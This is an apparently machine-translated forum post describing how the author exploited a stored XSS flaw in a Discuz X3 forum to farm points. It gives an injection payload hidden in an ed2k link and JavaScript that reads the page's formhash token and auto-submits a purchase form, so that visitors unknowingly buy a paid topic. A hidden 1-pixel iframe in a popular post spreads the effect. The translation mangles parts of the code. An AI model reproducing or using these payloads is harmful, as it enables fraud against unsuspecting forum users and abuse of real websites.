Easy-to-name Chinese Forum XSS vulnerabilities allow unlimited Corn farming
The DISCUZ X3 program of the easy-to-name Forum. Some time ago, the forum encountered an XSS vulnerability. Today, I just tried it during a visit to the Forum, and then I got the following corn (points ).
Find a post to reply, and insert a connection. In order to facilitate the subsequent refresh, try to reply to more than N pages of posts and insert code.
Ed2k: // | file | test | '+ document. write (String. fromCharCode () +' | test/
Here I insert the JS Code for the automatic purchase topic:
var vzhi =document.getElementsByName("formhash")[0].value;document.write('<form id=payform name=payform method=post autocomplete=off action=forum.php?mod=misc&action=pay&paysubmit=yes&infloat=yes><br>')document.write('<input type=hidden name=formhash value='+vzhi+'><br>')document.write('<input type=hidden name=referer value=http://www.dnbbs.com/./ ><br>')document.write('<input type=hidden name=tid value=869290><br>')/*document.write('<input type=submit name=submit value='+vzhi+'>')*/document.write('</form><br>')setTimeout("document.payform.submit()",1000)
In this way, the topic with the topic ID of 869290 will be automatically purchased (subject settings are charged ),
Select a hot post and insert another post.
Code:
Document. writeln ("<iframe src = \" first reply post address \ "frameborder = \" 0 \ "scrolling = \" No \ "height = \" 1px \ "width = \" 1px \ "> </iframe> ");
Then, the topic is continuously purchased without knowing it...
I was banned after just a few thousands of clicks .. High management efficiency .. No malicious means...